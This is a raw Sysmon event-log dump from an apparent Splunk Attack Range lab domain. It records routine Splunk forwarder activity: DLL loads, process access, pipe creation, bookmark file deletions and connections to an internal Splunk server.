12:18:11.024{8B6011A9-5B83-618E-4BF3-04000000F101}9184C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\kernel32.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=A5AD62615D2361BFAEC6C047B199184C,SHA256=B43F3DFDAF7BAA7A2B97015631F96CE429C50348D380080CFC29C36F959D7886trueMicrosoft WindowsValid 734700x800000000000000057346199Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:11.024{8B6011A9-5B83-618E-4BF3-04000000F101}9184C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\ntdll.dll10.0.14393.4530 (rs1_release.210705-0736)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=36B87C41EE39F3051D116F735EBEF866,SHA256=9C45BAE6D7E27B3AE04BBF88B96686C04ED6A43695558E82B687013BA0383F8AtrueMicrosoft WindowsValid 734700x800000000000000057346198Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:11.024{8B6011A9-5B83-618E-4BF3-04000000F101}9184C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exeMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8trueSplunk, Inc.Valid 10341000x800000000000000057346197Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:11.024{8B6011A9-8868-6164-0500-00000000F101}424548C:\Windows\system32\csrss.exe{8B6011A9-5B83-618E-4BF3-04000000F101}9184C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000057346196Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:11.024{8B6011A9-BB8A-618B-4CA0-04000000F101}74521152C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{8B6011A9-5B83-618E-4BF3-04000000F101}9184C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000057346195Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:11.010{8B6011A9-5B83-618E-4BF3-04000000F101}9184C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{8B6011A9-886B-6164-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8{8B6011A9-BB8A-618B-4CA0-04000000F101}7452C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 18141800x800000000000000057346194Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-ConnectPipe2021-11-12 12:18:11.009{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x800000000000000057346193Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreatePipe2021-11-12 12:18:11.009{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 18141800x800000000000000057346192Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-ConnectPipe2021-11-12 12:18:11.009{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x800000000000000057346191Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreatePipe2021-11-12 12:18:11.009{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 18141800x800000000000000057346190Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-ConnectPipe2021-11-12 12:18:11.009{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x800000000000000057346189Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreatePipe2021-11-12 12:18:11.009{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 23542300x800000000000000021219803Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:18:12.752{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=48C7BC47232FC914A7278A76F066F8CD,SHA256=C40CF397CE38A131D45B0F70F02EABA04B57C923710E3EE781B85AE1912FC129,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057346312Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:12.648{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057346311Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:12.648{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=10E3AFC41BFE18DF7EC28B338EDA6791,SHA256=F47EF0B127CA242814EBD89DD6E4207C7B08E6CB0F86F216E4C7320F509CFBE0falsetrue 10341000x800000000000000021219802Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:18:12.628{AD5E2759-5B84-618E-16CE-08000000F101}59163248C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{AD5E2759-54C7-6143-A600-00000000F101}4072C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219801Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:18:12.424{AD5E2759-54C7-6143-AA00-00000000F101}35682904C:\Windows\system32\conhost.exe{AD5E2759-5B84-618E-16CE-08000000F101}5916C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219800Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:18:12.409{AD5E2759-5433-6143-0C00-00000000F101}7325636C:\Windows\system32\svchost.exe{AD5E2759-5434-6143-1F00-00000000F101}1140C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219799Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:18:12.409{AD5E2759-5433-6143-0C00-00000000F101}7325636C:\Windows\system32\svchost.exe{AD5E2759-5434-6143-1F00-00000000F101}1140C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219798Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:18:12.409{AD5E2759-5433-6143-0C00-00000000F101}7325636C:\Windows\system32\svchost.exe{AD5E2759-5434-6143-1F00-00000000F101}1140C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219797Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:18:12.409{AD5E2759-5433-6143-0C00-00000000F101}7325636C:\Windows\system32\svchost.exe{AD5E2759-5434-6143-1F00-00000000F101}1140C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219796Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:18:12.409{AD5E2759-5432-6143-0500-00000000F101}4122828C:\Windows\system32\csrss.exe{AD5E2759-5B84-618E-16CE-08000000F101}5916C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021219795Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:18:12.409{AD5E2759-54C7-6143-A600-00000000F101}4072516C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{AD5E2759-5B84-618E-16CE-08000000F101}5916C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000021219794Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:18:12.394{AD5E2759-5B84-618E-16CE-08000000F101}5916C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{AD5E2759-5432-6143-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{AD5E2759-54C7-6143-A600-00000000F101}4072C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000021219793Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:18:12.299{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=31767260D66F8F207FC13CD0E7AE2736,SHA256=1BC9D5AA5F5A4CDB965C18E4813408A56AD0CFEDAE6D37B8959355112D53467F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000057346310Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:12.364{8B6011A9-887D-6164-2C00-00000000F101}2924NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0babd73079828ea96\channels\health\surveyor-20211011185454-44548MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7falsetrue 11241100x800000000000000057346309Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:12.017{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-09-16 14:18:46.122 23542300x800000000000000057346308Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:12.017{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=DD74F94F4BB8854E71C31147B9794808,SHA256=3F9770A5B2BC0C54E22EF905DFDD87FF4CAA0436005A3A7871AEC9439CB493AEfalsetrue 23542300x800000000000000021219805Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:18:13.784{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CDEF5C8A90318520CD352719CDC44472,SHA256=2B702825C32BC146FEAECB561AAE534087CAE7458D1293752952695D5262F342,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057346316Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:13.663{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057346315Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:13.663{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E091569778425C51A1294EE91BCFCF77,SHA256=2516CB17E5FE7A0D144DDF6C517215ACDC4731D29DB1F65C7CA40BB4AB03D9DFfalsetrue 23542300x800000000000000021219804Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:18:13.393{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=727A8B2726EEF5716B1BEAB868F45180,SHA256=AA484DEA0BF1D92EF733554758388CB84A2BEB1E935DCA763E0931662B2D3842,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057346314Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:13.179{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-09-16 14:18:46.122 23542300x800000000000000057346313Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:13.179{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B539494C25106B82AD9A28E24E2E4FF4,SHA256=4C4C61FE3DB1141A4194A1113452AAB34FFD982FD71C9BDB4A3DF4AAFF42E5BCfalsetrue 23542300x800000000000000021219808Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:18:14.815{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EFEBC30E26E45566D6F3B9A3DAF44ED1,SHA256=BD00D8B3E68C9DF16905C9582AE5C2278DFEA2ED39EE5A11F82F475E218B2E4B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057346321Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:14.677{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057346320Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:14.677{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=13DDD3B2E46E05AA684528E6C7EBAE98,SHA256=AD077E035ECF2914625BA3C99785CF58FA92BE416EB7ABADDDB6749C7F789B69falsetrue 354300x800000000000000021219807Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:19:00.487{AD5E2759-54CF-6143-D400-00000000F101}3540C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-874.attackrange.local64335-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 354300x800000000000000021219806Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:18:59.534{AD5E2759-54C7-6143-A600-00000000F101}4072C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-874.attackrange.local64334-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8089- 11241100x800000000000000057346319Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:14.578{8B6011A9-886D-6164-1200-00000000F101}460C:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.dat2021-10-11 18:55:38.088 23542300x800000000000000057346318Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:14.578{8B6011A9-886D-6164-1200-00000000F101}460NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=ADC6794AD3BAE55B8B7DB6942578599F,SHA256=C7C0E0CA504E96394ADA6BBD863938ABBC992903B48CDADA124057AF5B3102CFfalsetrue 354300x800000000000000057346317Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.516{8B6011A9-BB96-618B-7AA0-04000000F101}7856C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-469.attackrange.local54559-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x800000000000000021219809Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:18:15.846{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=065E93CEE26AB53D3DC66A07456CE91D,SHA256=0AEEF94A0D6E5CD719B4B831BE0677FC2295390A07DF68C3C9999C171F6EAD81,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057346323Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:15.693{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057346322Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:15.693{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1D50E4303D0786CDBE0F42E1E603B30A,SHA256=6F5FBD3FB7EC19127197C44C8843D76190483E2DB39FB44800E5034FC14C8435falsetrue 23542300x800000000000000021219810Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:18:16.846{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7E4ED40A70A515CBE5202B05EED2CA5A,SHA256=5C51FA3D7545FB3C28D3CB2C7DD7D677BE9596AC6F401563A5A266E3A170ADAF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057346325Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:16.729{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057346324Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:16.729{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=84295DB30BD8A8AF091D714A02B52DB6,SHA256=5CB8FC1A4C59DD9C75C638159E0872E29163EF699948A66D7C14E968D9CD9390falsetrue 23542300x800000000000000021219811Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:18:17.893{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D9D21B4D041921671681E19DA1FDF9AA,SHA256=3BA6F269F3262BA19F37016A6B898EF0F84D81F2F6A9BC6B545B080BF884F5FD,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057346327Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 